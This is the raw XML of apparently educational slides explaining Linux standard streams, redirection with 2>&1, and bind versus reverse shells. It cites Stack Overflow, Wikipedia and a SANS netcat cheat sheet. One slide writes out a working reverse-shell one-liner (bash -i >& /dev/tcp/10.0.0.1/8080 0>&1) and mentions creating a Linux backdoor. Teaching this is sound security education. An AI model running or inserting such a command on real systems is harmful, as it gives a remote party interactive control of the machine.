              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</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TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64561" y="165325"/>
            <a:ext cx="1808508" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim sends signals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1752620" y="319214"/>
            <a:ext cx="120449" cy="3185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3189308" y="94789"/>
            <a:ext cx="1518549" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker listens port 8080 first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3948583" y="512750"/>
            <a:ext cx="928523" cy="129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 name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197258" y="0"/>
            <a:ext cx="3933662" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="659566"/>
            <a:ext cx="2968566" cy="702166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="951356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Extra credits: Another approach for reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="821067" y="1047425"/>
            <a:ext cx="5790241" cy="3885556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6187002" y="0"/>
            <a:ext cx="2956998" cy="200055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385115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Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747924" y="1302837"/>
            <a:ext cx="7451195" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>There are two places programs send output to: Standard output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) and Standard Error (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can redirect these outputs to a different place (like a file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>File descriptors are used to identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (1) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>command &gt; output is just a shortcut for command 1&gt; output;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Using 2&gt;&amp;1 will redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to whatever value is set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (and 1&gt;&amp;2 will do the opposite).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96584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2000" dirty="0"/>
              <a:t>Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>may block the bind shell</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9437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69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell - attacker's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>acts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server. This is exactly what is done by the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/10.0.0.1/8080 0&gt;&amp;1</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058254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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>en.wikipedia.org/wiki/Standard_streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.brianstorti.com/understanding-shell-script-idiom-redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.computerhope.com/unix/nc.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378201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4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4012834" y="1105996"/>
            <a:ext cx="4267380" cy="2735799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717047" y="1973525"/>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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993019" y="1545928"/>
            <a:ext cx="1355154" cy="54600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Keyboard/file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993019" y="2516244"/>
            <a:ext cx="1355154" cy="54600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Display/file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2008504" y="1743281"/>
            <a:ext cx="2892417" cy="34970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23196" y="1631320"/>
            <a:ext cx="974947" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230083" y="2381387"/>
            <a:ext cx="2762936" cy="407861"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Elbow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3140372" y="1122442"/>
            <a:ext cx="185840" cy="3519454"/>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44774" y="2191081"/>
            <a:ext cx="1133644" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427400" y="3078343"/>
            <a:ext cx="1351652" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>err </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96927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Standard output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdout</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5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473645" y="1749858"/>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echo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986681" y="2157720"/>
            <a:ext cx="2052467" cy="243402"/>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2501372" y="1967414"/>
            <a:ext cx="1133644" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091565" y="1541501"/>
            <a:ext cx="4486901" cy="2048161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2089025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Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426284" y="1520823"/>
            <a:ext cx="4319588" cy="2833715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900182" y="1290953"/>
            <a:ext cx="4243818" cy="3063585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143529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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdin</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5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717047" y="1973525"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2008504" y="1743281"/>
            <a:ext cx="2892417" cy="34970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23196" y="1631320"/>
            <a:ext cx="974947" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4975293" y="1008812"/>
            <a:ext cx="3600953" cy="1552792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639319" y="3296756"/>
            <a:ext cx="7146508" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
